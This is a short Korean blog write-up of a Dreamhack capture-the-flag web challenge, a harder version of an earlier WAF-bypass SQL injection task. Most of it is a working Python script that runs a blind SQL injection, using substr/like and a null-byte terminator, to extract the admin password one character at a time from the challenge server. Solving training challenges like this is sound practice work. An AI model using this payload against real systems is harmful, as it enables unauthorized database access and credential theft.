728x90


저번에 풀었던 SQL injection bypass WAF 문제랑 동일하다.

다른 점은 더 많은 문자열이 필터링되어 있다.
import requests
from string import ascii_letters, digits
a = ascii_letters + digits
url = "http://host3.dreamhack.games:13684/"
num = 0
ch =''
while True:
num += 1
for i in a:
param = {"uid":"'||substr(upw,"+str(num)+",1)like('"+str(i)+"');%00"}
req = requests.get(url,params=param)
if "admin" in req.text:
ch += i
print(ch)
break
저번에 작성한 쿼리문이 그대로 여기서도 실행이 되어 만들어놓은 페이로드를 실행시키면 flag 값을 받을 수 있다.
'모의해킹 > Dreamhack' 카테고리의 다른 글
mongoboard [WEB LEVEL1] (0) | 2023.04.18 |
---|---|
tmitter [WEB LEVEL1] (0) | 2023.04.18 |
strcmp [WEB LEVEL1] (0) | 2023.04.18 |
sql injectuon bypass WAF [WEB LEVEL1] (0) | 2023.04.17 |
file-csp-1 [WEB LEVEL1] (0) | 2023.04.17 |